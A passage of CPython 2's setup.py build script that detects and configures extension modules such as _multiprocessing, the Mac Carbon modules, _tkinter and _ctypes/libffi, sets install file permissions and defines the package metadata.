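     | # pyexpat, so no system libexpat is required. Which Expat ended up inside
     | # can be checked (illustrative) with:
     | #     python -c "import pyexpat; print pyexpat.EXPAT_VERSION"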
1208 |
1209 | # Fredrik Lundh's cElementTree module. Note that this also
1210 | # uses expat (via the CAPI hook in pyexpat).
1211 |
1212 | if os.path.isfile(os.path.join(srcdir, 'Modules', '_elementtree.c')):
1213 | define_macros.append(('USE_PYEXPAT_CAPI', None))
1214 | exts.append(Extension('_elementtree',
1215 | define_macros = define_macros,
1216 | include_dirs = [expatinc],
1217 | sources = ['_elementtree.c'],
1218 | ))
1219 | else:
1220 | missing.append('_elementtree')
1221 |
1222 | # Hye-Shik Chang's CJKCodecs modules.
1223 | if have_unicode:
1224 | exts.append(Extension('_multibytecodec',
1225 | ['cjkcodecs/multibytecodec.c']))
1226 | for loc in ('kr', 'jp', 'cn', 'tw', 'hk', 'iso2022'):
1227 | exts.append(Extension('_codecs_%s' % loc,
1228 | ['cjkcodecs/_codecs_%s.c' % loc]))
1229 | else:
1230 | missing.append('_multibytecodec')
1231 | for loc in ('kr', 'jp', 'cn', 'tw', 'hk', 'iso2022'):
1232 | missing.append('_codecs_%s' % loc)
1233 |
1234 | # Dynamic loading module
1235 | if sys.maxint == 0x7fffffff:
1236 | # This requires sizeof(int) == sizeof(long) == sizeof(char*)
1237 | dl_inc = find_file('dlfcn.h', [], inc_dirs)
1238 | if (dl_inc is not None) and (platform not in ['atheos']):
1239 | exts.append( Extension('dl', ['dlmodule.c']) )
1240 | else:
1241 | missing.append('dl')
1242 | else:
1243 | missing.append('dl')
1244 |
1245 | # Thomas Heller's _ctypes module
1246 | self.detect_ctypes(inc_dirs, lib_dirs)
1247 |
1248 | # Richard Oudkerk's multiprocessing module
1249 | if platform == 'win32': # Windows
1250 | macros = dict()
1251 | libraries = ['ws2_32']
1252 |
1253 | elif platform == 'darwin': # Mac OSX
1254 | macros = dict(
1255 | HAVE_SEM_OPEN=1,
1256 | HAVE_SEM_TIMEDWAIT=0,
1257 | HAVE_FD_TRANSFER=1,
1258 | HAVE_BROKEN_SEM_GETVALUE=1
1259 | )
1260 | libraries = []
1261 |
1262 | elif platform == 'cygwin': # Cygwin
1263 | macros = dict(
1264 | HAVE_SEM_OPEN=1,
1265 | HAVE_SEM_TIMEDWAIT=1,
1266 | HAVE_FD_TRANSFER=0,
1267 | HAVE_BROKEN_SEM_UNLINK=1
1268 | )
1269 | libraries = []
1270 |
1271 | elif platform in ('freebsd4', 'freebsd5', 'freebsd6', 'freebsd7', 'freebsd8'):
1272 | # FreeBSD's P1003.1b semaphore support is very experimental
1273 | # and has many known problems (as of June 2008).
1274 | macros = dict( # FreeBSD
1275 | HAVE_SEM_OPEN=0,
1276 | HAVE_SEM_TIMEDWAIT=0,
1277 | HAVE_FD_TRANSFER=1,
1278 | )
1279 | libraries = []
1280 |
1281 | elif platform.startswith('openbsd'):
1282 | macros = dict( # OpenBSD
1283 | HAVE_SEM_OPEN=0, # Not implemented
1284 | HAVE_SEM_TIMEDWAIT=0,
1285 | HAVE_FD_TRANSFER=1,
1286 | )
1287 | libraries = []
1288 |
1289 | elif platform.startswith('netbsd'):
1290 | macros = dict( # at least NetBSD 5
1291 | HAVE_SEM_OPEN=1,
1292 | HAVE_SEM_TIMEDWAIT=0,
1293 | HAVE_FD_TRANSFER=1,
1294 | HAVE_BROKEN_SEM_GETVALUE=1
1295 | )
1296 | libraries = []
1297 |
1298 | else: # Linux and other unices
1299 | macros = dict(
1300 | HAVE_SEM_OPEN=1,
1301 | HAVE_SEM_TIMEDWAIT=1,
1302 | HAVE_FD_TRANSFER=1
1303 | )
1304 | libraries = ['rt']
1305 |
1306 | if platform == 'win32':
1307 | multiprocessing_srcs = [ '_multiprocessing/multiprocessing.c',
1308 | '_multiprocessing/semaphore.c',
1309 | '_multiprocessing/pipe_connection.c',
1310 | '_multiprocessing/socket_connection.c',
1311 | '_multiprocessing/win32_functions.c'
1312 | ]
1313 |
1314 | else:
1315 | multiprocessing_srcs = [ '_multiprocessing/multiprocessing.c',
1316 | '_multiprocessing/socket_connection.c'
1317 | ]
1318 |
1319 | if macros.get('HAVE_SEM_OPEN', False):
1320 | multiprocessing_srcs.append('_multiprocessing/semaphore.c')
1321 |
1322 | exts.append ( Extension('_multiprocessing', multiprocessing_srcs,
1323 | define_macros=macros.items(),
1324 | include_dirs=["Modules/_multiprocessing"]))
1325 | # End multiprocessing
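     | # Note: HAVE_SEM_OPEN above decides whether semaphore.c is compiled in.
     | # On platforms where it is 0 (e.g. OpenBSD and the FreeBSD releases
     | # listed), multiprocessing still imports, but creating synchronization
     | # primitives such as multiprocessing.Lock() raises ImportError at runtime.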
1326 |
1327 |
1328 | # Platform-specific libraries
1329 | if platform == 'linux2':
1330 | # Linux-specific modules
1331 | exts.append( Extension('linuxaudiodev', ['linuxaudiodev.c']) )
1332 | else:
1333 | missing.append('linuxaudiodev')
1334 |
1335 | if platform in ('linux2', 'freebsd4', 'freebsd5', 'freebsd6',
1336 | 'freebsd7', 'freebsd8'):
1337 | exts.append( Extension('ossaudiodev', ['ossaudiodev.c']) )
1338 | else:
1339 | missing.append('ossaudiodev')
1340 |
1341 | if platform == 'sunos5':
1342 | # SunOS specific modules
1343 | exts.append( Extension('sunaudiodev', ['sunaudiodev.c']) )
1344 | else:
1345 | missing.append('sunaudiodev')
1346 |
1347 | if platform == 'darwin' and ("--disable-toolbox-glue" not in
1348 | sysconfig.get_config_var("CONFIG_ARGS")):
1349 |
1350 | if int(os.uname()[2].split('.')[0]) >= 8:
1351 | # We're on Mac OS X 10.4 or later, so the compiler should
1352 | # support '-Wno-deprecated-declarations'. This will
1353 | # suppress deprecation warnings for the Carbon extensions,
1354 | # which wrap the Carbon APIs, including those parts that
1355 | # are deprecated.
1356 | carbon_extra_compile_args = ['-Wno-deprecated-declarations']
1357 | else:
1358 | carbon_extra_compile_args = []
1359 |
1360 | # Mac OS X specific modules.
1361 | def macSrcExists(name1, name2=''):
1362 | if not name1:
1363 | return None
1364 | names = (name1,)
1365 | if name2:
1366 | names = (name1, name2)
1367 | path = os.path.join(srcdir, 'Mac', 'Modules', *names)
1368 | return os.path.exists(path)
1369 |
1370 | def addMacExtension(name, kwds, extra_srcs=[]):
1371 | dirname = ''
1372 | if name[0] == '_':
1373 | dirname = name[1:].lower()
1374 | cname = name + '.c'
1375 | cmodulename = name + 'module.c'
1376 | # Check for NNN.c, NNNmodule.c, _nnn/NNN.c, _nnn/NNNmodule.c
1377 | if macSrcExists(cname):
1378 | srcs = [cname]
1379 | elif macSrcExists(cmodulename):
1380 | srcs = [cmodulename]
1381 | elif macSrcExists(dirname, cname):
1382 | # XXX(nnorwitz): If all the names ended with module, we
1383 | # wouldn't need this condition. ibcarbon is the only one.
1384 | srcs = [os.path.join(dirname, cname)]
1385 | elif macSrcExists(dirname, cmodulename):
1386 | srcs = [os.path.join(dirname, cmodulename)]
1387 | else:
1388 | raise RuntimeError("%s not found" % name)
1389 |
1390 | # Here's the whole point: add the extension with sources
1391 | exts.append(Extension(name, srcs + extra_srcs, **kwds))
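     | # For example, the addMacExtension('_CF', core_kwds, ['cf/pycfbridge.c'])
     | # call below looks for Mac/Modules/_CF.c, Mac/Modules/_CFmodule.c,
     | # Mac/Modules/cf/_CF.c and Mac/Modules/cf/_CFmodule.c, in that order, and
     | # builds the first one it finds together with cf/pycfbridge.c.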
1392 |
1393 | # Core Foundation
1394 | core_kwds = {'extra_compile_args': carbon_extra_compile_args,
1395 | 'extra_link_args': ['-framework', 'CoreFoundation'],
1396 | }
1397 | addMacExtension('_CF', core_kwds, ['cf/pycfbridge.c'])
1398 | addMacExtension('autoGIL', core_kwds)
1399 |
1400 | # Carbon
1401 | carbon_kwds = {'extra_compile_args': carbon_extra_compile_args,
1402 | 'extra_link_args': ['-framework', 'Carbon'],
1403 | }
1404 | CARBON_EXTS = ['ColorPicker', 'gestalt', 'MacOS', 'Nav',
1405 | 'OSATerminology', 'icglue',
1406 | # All these are in subdirs
1407 | '_AE', '_AH', '_App', '_CarbonEvt', '_Cm', '_Ctl',
1408 | '_Dlg', '_Drag', '_Evt', '_File', '_Folder', '_Fm',
1409 | '_Help', '_Icn', '_IBCarbon', '_List',
1410 | '_Menu', '_Mlte', '_OSA', '_Res', '_Qd', '_Qdoffs',
1411 | '_Scrap', '_Snd', '_TE',
1412 | ]
1413 | for name in CARBON_EXTS:
1414 | addMacExtension(name, carbon_kwds)
1415 |
1416 | # Workaround for a bug in the version of gcc shipped with Xcode 3.
1417 | # The _Win extension should build just like the other Carbon extensions, but
1418 | # this actually results in a hard crash of the linker.
1419 | #
1420 | if '-arch ppc64' in cflags and '-arch ppc' in cflags:
1421 | win_kwds = {'extra_compile_args': carbon_extra_compile_args + ['-arch', 'i386', '-arch', 'ppc'],
1422 | 'extra_link_args': ['-framework', 'Carbon', '-arch', 'i386', '-arch', 'ppc'],
1423 | }
1424 | addMacExtension('_Win', win_kwds)
1425 | else:
1426 | addMacExtension('_Win', carbon_kwds)
1427 |
1428 |
1429 | # Application Services & QuickTime
1430 | app_kwds = {'extra_compile_args': carbon_extra_compile_args,
1431 | 'extra_link_args': ['-framework','ApplicationServices'],
1432 | }
1433 | addMacExtension('_Launch', app_kwds)
1434 | addMacExtension('_CG', app_kwds)
1435 |
1436 | exts.append( Extension('_Qt', ['qt/_Qtmodule.c'],
1437 | extra_compile_args=carbon_extra_compile_args,
1438 | extra_link_args=['-framework', 'QuickTime',
1439 | '-framework', 'Carbon']) )
1440 |
1441 |
1442 | self.extensions.extend(exts)
1443 |
1444 | # Call the method for detecting whether _tkinter can be compiled
1445 | self.detect_tkinter(inc_dirs, lib_dirs)
1446 |
1447 | if '_tkinter' not in [e.name for e in self.extensions]:
1448 | missing.append('_tkinter')
1449 |
1450 | return missing
1451 |
1452 | def detect_tkinter_darwin(self, inc_dirs, lib_dirs):
1453 | # The _tkinter module, using frameworks. Since frameworks are quite
1454 | # different, the UNIX search logic is not sharable.
1455 | from os.path import join, exists
1456 | framework_dirs = [
1457 | '/Library/Frameworks',
1458 | '/System/Library/Frameworks/',
1459 | join(os.getenv('HOME') or '', 'Library', 'Frameworks')
1460 | ]
1461 |
1462 | # Find the directory that contains the Tcl.framework and Tk.framework
1463 | # bundles.
1464 | # XXX distutils should support -F!
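     | # (The for/else constructs below use Python's loop-else semantics: the
     | # inner else triggers only when both frameworks exist in F and then breaks
     | # out of the outer loop; the outer else runs only if no directory had both.)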
1465 | for F in framework_dirs:
1466 | # both Tcl.framework and Tk.framework should be present
1467 | for fw in 'Tcl', 'Tk':
1468 | if not exists(join(F, fw + '.framework')):
1469 | break
1470 | else:
1471 | # ok, F is now a directory with both frameworks. Continue
1472 | # building
1473 | break
1474 | else:
1475 | # Tk and Tcl frameworks not found. Normal "unix" tkinter search
1476 | # will now resume.
1477 | return 0
1478 |
1479 | # For 8.4a2, we must add -I options that point inside the Tcl and Tk
1480 | # frameworks. In later releases we should hopefully be able to pass
1481 | # the -F option to gcc, which specifies a framework lookup path.
1482 | #
1483 | include_dirs = [
1484 | join(F, fw + '.framework', H)
1485 | for fw in 'Tcl', 'Tk'
1486 | for H in 'Headers', 'Versions/Current/PrivateHeaders'
1487 | ]
1488 |
1489 | # For 8.4a2, the X11 headers are not included. Rather than include a
1490 | # complicated search, this is a hard-coded path. It could bail out
1491 | # if X11 libs are not found...
1492 | include_dirs.append('/usr/X11R6/include')
1493 | frameworks = ['-framework', 'Tcl', '-framework', 'Tk']
1494 |
1495 | # All existing framework builds of Tcl/Tk don't support 64-bit
1496 | # architectures.
1497 | cflags = sysconfig.get_config_vars('CFLAGS')[0]
1498 | archs = re.findall(r'-arch\s+(\w+)', cflags)
1499 | if 'x86_64' in archs or 'ppc64' in archs:
1500 | try:
1501 | archs.remove('x86_64')
1502 | except ValueError:
1503 | pass
1504 | try:
1505 | archs.remove('ppc64')
1506 | except ValueError:
1507 | pass
1508 |
1509 | for a in archs:
1510 | frameworks.append('-arch')
1511 | frameworks.append(a)
1512 |
1513 | ext = Extension('_tkinter', ['_tkinter.c', 'tkappinit.c'],
1514 | define_macros=[('WITH_APPINIT', 1)],
1515 | include_dirs = include_dirs,
1516 | libraries = [],
1517 | extra_compile_args = frameworks[2:],
1518 | extra_link_args = frameworks,
1519 | )
1520 | self.extensions.append(ext)
1521 | return 1
1522 |
1523 |
1524 | def detect_tkinter(self, inc_dirs, lib_dirs):
1525 | # The _tkinter module.
1526 |
1527 | # Rather than complicate the code below, detecting and building
1528 | # AquaTk is a separate method. Only one Tkinter will be built on
1529 | # Darwin - either AquaTk, if it is found, or X11 based Tk.
1530 | platform = self.get_platform()
1531 | if (platform == 'darwin' and
1532 | self.detect_tkinter_darwin(inc_dirs, lib_dirs)):
1533 | return
1534 |
1535 | # Assume we haven't found any of the libraries or include files
1536 | # The versions with dots are used on Unix, and the versions without
1537 | # dots on Windows, for detection by cygwin.
1538 | tcllib = tklib = tcl_includes = tk_includes = None
1539 | for version in ['8.5', '85', '8.4', '84', '8.3', '83', '8.2',
1540 | '82', '8.1', '81', '8.0', '80']:
1541 | tklib = self.compiler.find_library_file(lib_dirs, 'tk' + version)
1542 | tcllib = self.compiler.find_library_file(lib_dirs, 'tcl' + version)
1543 | if tklib and tcllib:
1544 | # Exit the loop when we've found the Tcl/Tk libraries
1545 | break
1546 |
1547 | # Now check for the header files
1548 | if tklib and tcllib:
1549 | # Check for the include files on Debian and {Free,Open}BSD, where
1550 | # they're put in /usr/include/{tcl,tk}X.Y
1551 | dotversion = version
1552 | if '.' not in dotversion and "bsd" in sys.platform.lower():
1553 | # OpenBSD and FreeBSD use Tcl/Tk library names like libtcl83.a,
1554 | # but the include subdirs are named like .../include/tcl8.3.
1555 | dotversion = dotversion[:-1] + '.' + dotversion[-1]
1556 | tcl_include_sub = []
1557 | tk_include_sub = []
1558 | for dir in inc_dirs:
1559 | tcl_include_sub += [dir + os.sep + "tcl" + dotversion]
1560 | tk_include_sub += [dir + os.sep + "tk" + dotversion]
1561 | tk_include_sub += tcl_include_sub
1562 | tcl_includes = find_file('tcl.h', inc_dirs, tcl_include_sub)
1563 | tk_includes = find_file('tk.h', inc_dirs, tk_include_sub)
1564 |
1565 | if (tcllib is None or tklib is None or
1566 | tcl_includes is None or tk_includes is None):
1567 | self.announce("INFO: Can't locate Tcl/Tk libs and/or headers", 2)
1568 | return
1569 |
1570 | # OK... everything seems to be present for Tcl/Tk.
1571 |
1572 | include_dirs = [] ; libs = [] ; defs = [] ; added_lib_dirs = []
1573 | for dir in tcl_includes + tk_includes:
1574 | if dir not in include_dirs:
1575 | include_dirs.append(dir)
1576 |
1577 | # Check for various platform-specific directories
1578 | if platform == 'sunos5':
1579 | include_dirs.append('/usr/openwin/include')
1580 | added_lib_dirs.append('/usr/openwin/lib')
1581 | elif os.path.exists('/usr/X11R6/include'):
1582 | include_dirs.append('/usr/X11R6/include')
1583 | added_lib_dirs.append('/usr/X11R6/lib64')
1584 | added_lib_dirs.append('/usr/X11R6/lib')
1585 | elif os.path.exists('/usr/X11R5/include'):
1586 | include_dirs.append('/usr/X11R5/include')
1587 | added_lib_dirs.append('/usr/X11R5/lib')
1588 | else:
1589 | # Assume default location for X11
1590 | include_dirs.append('/usr/X11/include')
1591 | added_lib_dirs.append('/usr/X11/lib')
1592 |
1593 | # If Cygwin, then verify that X is installed before proceeding
1594 | if platform == 'cygwin':
1595 | x11_inc = find_file('X11/Xlib.h', [], include_dirs)
1596 | if x11_inc is None:
1597 | return
1598 |
1599 | # Check for BLT extension
1600 | if self.compiler.find_library_file(lib_dirs + added_lib_dirs,
1601 | 'BLT8.0'):
1602 | defs.append( ('WITH_BLT', 1) )
1603 | libs.append('BLT8.0')
1604 | elif self.compiler.find_library_file(lib_dirs + added_lib_dirs,
1605 | 'BLT'):
1606 | defs.append( ('WITH_BLT', 1) )
1607 | libs.append('BLT')
1608 |
1609 | # Add the Tcl/Tk libraries
1610 | libs.append('tk'+ version)
1611 | libs.append('tcl'+ version)
1612 |
1613 | if platform in ['aix3', 'aix4']:
1614 | libs.append('ld')
1615 |
1616 | # Finally, link with the X11 libraries (not appropriate on cygwin)
1617 | if platform != "cygwin":
1618 | libs.append('X11')
1619 |
1620 | ext = Extension('_tkinter', ['_tkinter.c', 'tkappinit.c'],
1621 | define_macros=[('WITH_APPINIT', 1)] + defs,
1622 | include_dirs = include_dirs,
1623 | libraries = libs,
1624 | library_dirs = added_lib_dirs,
1625 | )
1626 | self.extensions.append(ext)
1627 |
1628 | ## # Uncomment these lines if you want to play with xxmodule.c
1629 | ## ext = Extension('xx', ['xxmodule.c'])
1630 | ## self.extensions.append(ext)
1631 |
1632 | # XXX handle these, but how to detect?
1633 | # *** Uncomment and edit for PIL (TkImaging) extension only:
1634 | # -DWITH_PIL -I../Extensions/Imaging/libImaging tkImaging.c \
1635 | # *** Uncomment and edit for TOGL extension only:
1636 | # -DWITH_TOGL togl.c \
1637 | # *** Uncomment these for TOGL extension only:
1638 | # -lGL -lGLU -lXext -lXmu \
1639 |
1640 | def configure_ctypes_darwin(self, ext):
1641 | # Darwin (OS X) uses preconfigured files, in
1642 | # the Modules/_ctypes/libffi_osx directory.
1643 | (srcdir,) = sysconfig.get_config_vars('srcdir')
1644 | ffi_srcdir = os.path.abspath(os.path.join(srcdir, 'Modules',
1645 | '_ctypes', 'libffi_osx'))
1646 | sources = [os.path.join(ffi_srcdir, p)
1647 | for p in ['ffi.c',
1648 | 'x86/darwin64.S',
1649 | 'x86/x86-darwin.S',
1650 | 'x86/x86-ffi_darwin.c',
1651 | 'x86/x86-ffi64.c',
1652 | 'powerpc/ppc-darwin.S',
1653 | 'powerpc/ppc-darwin_closure.S',
1654 | 'powerpc/ppc-ffi_darwin.c',
1655 | 'powerpc/ppc64-darwin_closure.S',
1656 | ]]
1657 |
1658 | # Add .S (preprocessed assembly) to C compiler source extensions.
1659 | self.compiler.src_extensions.append('.S')
1660 |
1661 | include_dirs = [os.path.join(ffi_srcdir, 'include'),
1662 | os.path.join(ffi_srcdir, 'powerpc')]
1663 | ext.include_dirs.extend(include_dirs)
1664 | ext.sources.extend(sources)
1665 | return True
1666 |
1667 | def configure_ctypes(self, ext):
1668 | if not self.use_system_libffi:
1669 | if sys.platform == 'darwin':
1670 | return self.configure_ctypes_darwin(ext)
1671 |
1672 | (srcdir,) = sysconfig.get_config_vars('srcdir')
1673 | ffi_builddir = os.path.join(self.build_temp, 'libffi')
1674 | ffi_srcdir = os.path.abspath(os.path.join(srcdir, 'Modules',
1675 | '_ctypes', 'libffi'))
1676 | ffi_configfile = os.path.join(ffi_builddir, 'fficonfig.py')
1677 |
1678 | from distutils.dep_util import newer_group
1679 |
1680 | config_sources = [os.path.join(ffi_srcdir, fname)
1681 | for fname in os.listdir(ffi_srcdir)
1682 | if os.path.isfile(os.path.join(ffi_srcdir, fname))]
1683 | if self.force or newer_group(config_sources,
1684 | ffi_configfile):
1685 | from distutils.dir_util import mkpath
1686 | mkpath(ffi_builddir)
1687 | config_args = []
1688 |
1689 | # Pass empty CFLAGS because we'll just append the resulting
1690 | # CFLAGS to Python's; -g or -O2 is to be avoided.
1691 | cmd = "cd %s && env CFLAGS='' '%s/configure' %s" \
1692 | % (ffi_builddir, ffi_srcdir, " ".join(config_args))
1693 |
1694 | res = os.system(cmd)
1695 | if res or not os.path.exists(ffi_configfile):
1696 | print "Failed to configure _ctypes module"
1697 | return False
1698 |
1699 | fficonfig = {}
1700 | execfile(ffi_configfile, globals(), fficonfig)
1701 | ffi_srcdir = os.path.join(fficonfig['ffi_srcdir'], 'src')
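     | # fficonfig.py is generated by the libffi configure run above; execfile()
     | # loads its definitions (ffi_srcdir, ffi_sources, ffi_cflags, ...) into the
     | # fficonfig dict used below to finish setting up the _ctypes extension.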
1702 |
1703 | # Add .S (preprocessed assembly) to C compiler source extensions.
1704 | self.compiler.src_extensions.append('.S')
1705 |
1706 | include_dirs = [os.path.join(ffi_builddir, 'include'),
1707 | ffi_builddir, ffi_srcdir]
1708 | extra_compile_args = fficonfig['ffi_cflags'].split()
1709 |
1710 | ext.sources.extend(fficonfig['ffi_sources'])
1711 | ext.include_dirs.extend(include_dirs)
1712 | ext.extra_compile_args.extend(extra_compile_args)
1713 | return True
1714 |
1715 | def detect_ctypes(self, inc_dirs, lib_dirs):
1716 | self.use_system_libffi = False
1717 | include_dirs = []
1718 | extra_compile_args = []
1719 | extra_link_args = []
1720 | sources = ['_ctypes/_ctypes.c',
1721 | '_ctypes/callbacks.c',
1722 | '_ctypes/callproc.c',
1723 | '_ctypes/stgdict.c',
1724 | '_ctypes/cfield.c',
1725 | '_ctypes/malloc_closure.c']
1726 | depends = ['_ctypes/ctypes.h']
1727 |
1728 | if sys.platform == 'darwin':
1729 | sources.append('_ctypes/darwin/dlfcn_simple.c')
1730 | extra_compile_args.append('-DMACOSX')
1731 | include_dirs.append('_ctypes/darwin')
1732 | # XXX Is this still needed?
1733 | ## extra_link_args.extend(['-read_only_relocs', 'warning'])
1734 |
1735 | elif sys.platform == 'sunos5':
1736 | # XXX This shouldn't be necessary; it appears that some
1737 | # of the assembler code is non-PIC (i.e. it has relocations
1738 | # when it shouldn't). The proper fix would be to rewrite
1739 | # the assembler code to be PIC.
1740 | # This only works with GCC; the Sun compiler likely refuses
1741 | # this option. If you want to compile ctypes with the Sun
1742 | # compiler, please research a proper solution, instead of
1743 | # finding some -z option for the Sun compiler.
1744 | extra_link_args.append('-mimpure-text')
1745 |
1746 | elif sys.platform.startswith('hp-ux'):
1747 | extra_link_args.append('-fPIC')
1748 |
1749 | ext = Extension('_ctypes',
1750 | include_dirs=include_dirs,
1751 | extra_compile_args=extra_compile_args,
1752 | extra_link_args=extra_link_args,
1753 | libraries=[],
1754 | sources=sources,
1755 | depends=depends)
1756 | ext_test = Extension('_ctypes_test',
1757 | sources=['_ctypes/_ctypes_test.c'])
1758 | self.extensions.extend([ext, ext_test])
1759 |
1760 | if '--with-system-ffi' not in sysconfig.get_config_var("CONFIG_ARGS"):
1761 | return
1762 |
1763 | if sys.platform == 'darwin':
1764 | # OS X 10.5 comes with libffi.dylib; the include files are
1765 | # in /usr/include/ffi
1766 | inc_dirs.append('/usr/include/ffi')
1767 |
1768 | ffi_inc = find_file('ffi.h', [], inc_dirs)
1769 | if ffi_inc is not None:
1770 | ffi_h = ffi_inc[0] + '/ffi.h'
1771 | fp = open(ffi_h)
1772 | while 1:
1773 | line = fp.readline()
1774 | if not line:
1775 | ffi_inc = None
1776 | break
1777 | if line.startswith('#define LIBFFI_H'):
1778 | break
1779 | ffi_lib = None
1780 | if ffi_inc is not None:
1781 | for lib_name in ('ffi_convenience', 'ffi_pic', 'ffi'):
1782 | if (self.compiler.find_library_file(lib_dirs, lib_name)):
1783 | ffi_lib = lib_name
1784 | break
1785 |
1786 | if ffi_inc and ffi_lib:
1787 | ext.include_dirs.extend(ffi_inc)
1788 | ext.libraries.append(ffi_lib)
1789 | self.use_system_libffi = True
1790 |
1791 |
1792 | class PyBuildInstall(install):
1793 | # Suppress the warning about installation into the lib_dynload
1794 | # directory, which is not in sys.path when running Python during
1795 | # installation:
1796 | def initialize_options (self):
1797 | install.initialize_options(self)
1798 | self.warn_dir=0
1799 |
1800 | class PyBuildInstallLib(install_lib):
1801 | # Do exactly what install_lib does but make sure correct access modes get
1802 | # set on installed directories and files. All installed files will get
1803 | # mode 644 unless they are a shared library in which case they will get
1804 | # mode 755. All installed directories will get mode 755.
1805 |
1806 | so_ext = sysconfig.get_config_var("SO")
1807 |
1808 | def install(self):
1809 | outfiles = install_lib.install(self)
1810 | self.set_file_modes(outfiles, 0644, 0755)
1811 | self.set_dir_modes(self.install_dir, 0755)
1812 | return outfiles
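     | # 0644 and 0755 are Python 2 octal literals (0o644/0o755 in Python 3),
     | # i.e. rw-r--r-- for ordinary files and rwxr-xr-x for shared libraries
     | # and directories.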
1813 |
1814 | def set_file_modes(self, files, defaultMode, sharedLibMode):
1815 | if not self.is_chmod_supported(): return
1816 | if not files: return
1817 |
1818 | for filename in files:
1819 | if os.path.islink(filename): continue
1820 | mode = defaultMode
1821 | if filename.endswith(self.so_ext): mode = sharedLibMode
1822 | log.info("changing mode of %s to %o", filename, mode)
1823 | if not self.dry_run: os.chmod(filename, mode)
1824 |
1825 | def set_dir_modes(self, dirname, mode):
1826 | if not self.is_chmod_supported(): return
1827 | os.path.walk(dirname, self.set_dir_modes_visitor, mode)
1828 |
1829 | def set_dir_modes_visitor(self, mode, dirname, names):
1830 | if os.path.islink(dirname): return
1831 | log.info("changing mode of %s to %o", dirname, mode)
1832 | if not self.dry_run: os.chmod(dirname, mode)
1833 |
1834 | def is_chmod_supported(self):
1835 | return hasattr(os, 'chmod')
1836 |
1837 | SUMMARY = """
1838 | Python is an interpreted, interactive, object-oriented programming
1839 | language. It is often compared to Tcl, Perl, Scheme or Java.
1840 |
1841 | Python combines remarkable power with very clear syntax. It has
1842 | modules, classes, exceptions, very high level dynamic data types, and
1843 | dynamic typing. There are interfaces to many system calls and
1844 | libraries, as well as to various windowing systems (X11, Motif, Tk,
1845 | Mac, MFC). New built-in modules are easily written in C or C++. Python
1846 | is also usable as an extension language for applications that need a
1847 | programmable interface.
1848 |
1849 | The Python implementation is portable: it runs on many brands of UNIX,
1850 | on Windows, DOS, OS/2, Mac, Amiga... If your favorite system isn't
1851 | listed here, it may still be supported, if there's a C compiler for
1852 | it. Ask around on comp.lang.python -- or just try compiling Python
1853 | yourself.
1854 | """
1855 |
1856 | CLASSIFIERS = """
1857 | Development Status :: 6 - Mature
1858 | License :: OSI Approved :: Python Software Foundation License
1859 | Natural Language :: English
1860 | Programming Language :: C
1861 | Programming Language :: Python
1862 | Topic :: Software Development
1863 | """
1864 |
1865 | def main():
1866 | # turn off warnings when deprecated modules are imported
1867 | import warnings
1868 | warnings.filterwarnings("ignore",category=DeprecationWarning)
1869 | setup(# PyPI Metadata (PEP 301)
1870 | name = "Python",
1871 | version = sys.version.split()[0],
1872 | url = "http://www.python.org/%s" % sys.version[:3],
1873 | maintainer = "Guido van Rossum and the Python community",
1874 | maintainer_email = "python-dev@python.org",
1875 | description = "A high-level object-oriented programming language",
1876 | long_description = SUMMARY.strip(),
1877 | license = "PSF license",
1878 | classifiers = filter(None, CLASSIFIERS.split("\n")),
1879 | platforms = ["Many"],
1880 |
1881 | # Build info
1882 | cmdclass = {'build_ext':PyBuildExt, 'install':PyBuildInstall,
1883 | 'install_lib':PyBuildInstallLib},
1884 | # The struct module is defined here, because build_ext won't be
1885 | # called unless there's at least one extension module defined.
1886 | ext_modules=[Extension('_struct', ['_struct.c'])],
1887 |
1888 | # Scripts to install
1889 | scripts = ['Tools/scripts/pydoc', 'Tools/scripts/idle',
1890 | 'Tools/scripts/2to3',
1891 | 'Lib/smtpd.py']
1892 | )
1893 |
1894 | # --install-platlib
1895 | if __name__ == '__main__':
1896 | main()
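     | # Note: this script is normally driven by the top-level Makefile using the
     | # freshly built interpreter, roughly "./python -E ./setup.py build";
     | # running it by hand is possible but not the usual path.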
1897 |
--------------------------------------------------------------------------------